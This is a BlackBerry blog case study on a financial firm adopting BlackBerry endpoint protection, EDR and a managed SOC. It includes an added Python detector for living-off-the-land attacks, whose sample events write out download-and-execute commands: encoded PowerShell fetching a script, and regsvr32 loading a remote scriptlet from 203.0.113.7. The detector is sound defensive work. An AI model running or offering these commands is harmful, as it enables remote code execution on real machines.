BlackBerry ThreatVector Blog

Case Study: Overselling Self-Reliance - What We Owe Each Other In A Connected World

Author’s Note: BlackBerry completed its acquisition of Cylance on February 21, 2019, and is currently selling the CylancePROTECT®, CylanceOPTICS®, and CylanceGUARD® solutions under the newly rebranded names BlackBerry® Protect, BlackBerry® Optics, and BlackBerry® Guard. All references to the Cylance organization and its branded products and services in this case study utilize BlackBerry branding.

If nothing else, the COVID-19 crisis has demonstrated the pitfalls of believing we are islands entire of ourselves, to paraphrase a line from John Donne’s Meditation XVII. The illusion that self-reliance alone governs our lives is unsustainable in a world where hospital workers in New York City depend on protective gear made in China to avoid infection, and rural farmers plow under their crops because restaurants in urban centers have shut down.

Our essential interconnectedness shows up just as strongly in the realm of cybersecurity. In 2017, a Russian threat group attacked Ukraine by planting the NotPetya malware in an update to a popular accounting package, a software supply-chain compromise that turned a trusted update channel into the delivery vector. Before it was contained, NotPetya infected tens of thousands of computers across the globe, causing widespread damage and, within hours, crippling a shipping company that carries roughly one-fifth of the world's container freight. In a connected world, malware doesn't respect national boundaries.

Of course, mutual dependence doesn’t absolve us of our personal obligations to act responsibly. As individuals and organizations, it’s still incumbent upon us to practice good cyber hygiene, patch vulnerable systems, and implement security controls that protect data privacy and integrity. Consider the example of BlackBerry customer Prospect Capital Management (PCM).

Prospect Capital Management Sets Its Sights on Prevention

In early 2017, CTO Al Faella and CISO Steven Elliott had lost confidence in the efficacy of the firm’s legacy endpoint defenses. “Prospect’s mission is to generate long-term value for our portfolio companies, private equity sponsors, and investors,” says Faella. “This begins with ensuring that the sensitive client, partner, and investment data our analysts rely upon to conduct business is never exposed, ransomed, or stolen by cybercriminals.”

The team invited BlackBerry and three other firms to participate in a Proof of Concept (POC) evaluation of next-gen endpoint protection products. After intensive testing, they selected BlackBerry® Protect. “Since then, we’ve had no reason to second-guess our decision to partner with BlackBerry,” says Faella. “In the three years since we deployed BlackBerry Protect, we’ve experienced a total of zero infections while maintaining a 100% protection rate.”

Seeking Help Is Sound Business and Security Strategy

Threat groups increasingly rely on stolen credentials, rather than custom malware, to achieve their objectives, and they carry out the intrusion with tools already present on the host. Such living-off-the-land attacks give signature-based prevention little to match on, so resilient organizations complement their endpoint protection controls with endpoint detection and response (EDR), which records process, script and logon behavior and flags abuse of legitimate tools. Once again, the Prospect team stepped up to the challenge.
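To make the preceding point concrete, here is an added example of the kind of behavioral logic an EDR layer applies to process-creation telemetry. It is not code from the case study and not BlackBerry Optics rule syntax; the event schema, hostnames, users, command lines and the 203.0.113.7 address are constructed for illustration. It flags three living-off-the-land patterns (encoded PowerShell that decodes to a download-and-execute payload, an Office application spawning a script host, and a signed Windows binary such as regsvr32 invoked with a remote URL) while deliberately letting a benign encoded administrative command through, which is the false-positive tuning the Prospect team describes.

```python
"""Toy living-off-the-land (LOTL) detector run over constructed process-creation events.

Added illustration only: not code from the case study and not BlackBerry Optics
rule syntax. The event schema, hostnames, users, command lines and the
203.0.113.7 address are all constructed for this example.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str   # parent process image name
    image: str    # spawned process image name
    cmdline: str  # full command line as recorded by the sensor


OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_LAUNCHERS = {"regsvr32.exe", "mshta.exe", "rundll32.exe"}
# Cues that turn a decoded PowerShell payload from "odd" into "worth an alert".
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "invoke-expression", "iex",
                 "frombase64string", "http")
# -e / -ec / -enc / -encodedcommand followed by a base64 token.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})",
                      re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_event(ev: ProcessEvent) -> List[str]:
    """Apply each rule to one event; an empty list means no alert."""
    reasons: List[str] = []
    image, parent, cl = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()

    # Rule 1: encoded PowerShell whose decoded payload fetches or evals remote code.
    # Encoded commands are common in legitimate admin tooling, so the decode-then-judge
    # step is the false-positive control: the flag alone never fires.
    payload = decode_encoded_command(ev.cmdline) if image == "powershell.exe" else None
    if payload and any(cue in payload.lower() for cue in DOWNLOAD_CUES):
        reasons.append(f"encoded PowerShell with download/execute cue: {payload.strip()[:60]}")

    # Rule 2: an Office application spawning a script host (macro or exploit launched a shell).
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")

    # Rule 3: signed Windows binaries used to fetch and run remote code (scriptlets, HTA).
    if image in URL_LAUNCHERS and "http" in cl:
        reasons.append(f"{image} invoked with a remote URL")

    return reasons


def triage(events: List[ProcessEvent]) -> List[Tuple[str, str, str, List[str]]]:
    """Return (host, user, image, reasons) for every event that tripped at least one rule."""
    return [(ev.host, ev.user, ev.image, r) for ev in events if (r := check_event(ev))]


def _enc(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (hosts, users and command lines are made up).
SAMPLE_EVENTS = [
    ProcessEvent("WS-01", "alice", "explorer.exe", "powershell.exe",
                 "powershell.exe -NoP -W Hidden -Enc "
                 + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')")),
    ProcessEvent("WS-02", "bob", "winword.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent("WS-03", "carol", "svchost.exe", "regsvr32.exe",
                 "regsvr32.exe /s /u /i:http://203.0.113.7/x.sct scrobj.dll"),
    # Benign admin use: encoded, but the payload is only a directory listing.
    ProcessEvent("WS-04", "dave", "explorer.exe", "powershell.exe",
                 "powershell.exe -Enc " + _enc("Get-ChildItem C:\\Reports | Measure-Object")),
    ProcessEvent("WS-05", "erin", "explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for host, user, image, reasons in triage(SAMPLE_EVENTS):
        print(f"{host} {user} {image}: {'; '.join(reasons)}")
```

The three constructed malicious events on WS-01, WS-02 and WS-03 each produce an alert; the encoded but harmless command on WS-04 and the notepad launch on WS-05 do not. In a real deployment the cue list and parent/child pairs are the knobs a SOC tunes against its own baseline, which is the work the Prospect team chose to hand to a managed service.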

“We’ve never been breached, but it would be irresponsible to assume it could never happen,” says Faella. He and Elliott evaluated several EDR solutions before selecting BlackBerry® Optics. “We concluded that BlackBerry Optics had the most flexible detection and response framework, which would allow us to fine-tune its detection rules to minimize false positives,” says Faella. “We also knew it takes considerable expertise to effectively implement and manage an EDR solution, so we were intrigued when we learned about BlackBerry® Guard.”

Adds Elliott, “Now, in addition to industry-leading security controls, we were being offered a Security Operations Center (SOC) to monitor our environment, triage alerts, hunt for threats, and keep us informed about potential attacks. It was the perfect fit for our needs.”

The Prospect team was wise to accept the help being offered. The BlackBerry Guard onboarding concluded a scant three days before New York Governor Andrew Cuomo issued a March 20, 2020 executive order closing the physical offices of all non-essential businesses. Recognizing an opportunity to exploit the crisis, cybercriminals quickly launched a series of massive spam and phishing campaigns.

“Thanks to BlackBerry Guard, we weren’t affected,” says Elliott. “And with the BlackBerry SOC team watching our backs, we’re confident our employees can work from home both safely and securely.”

Read the full case study here.


About Eric Milam

VP of Research Operations, BlackBerry

Eric Milam is the VP of Research Operations at BlackBerry, where he and his team track malware threats and threat actors. During his time at BlackBerry, he discovered and published the details of numerous emerging threats and malware variants in active use in the wild.

Prior to joining BlackBerry, Eric was a highly regarded penetration tester and frequent conference speaker, widely known for his red-teaming work.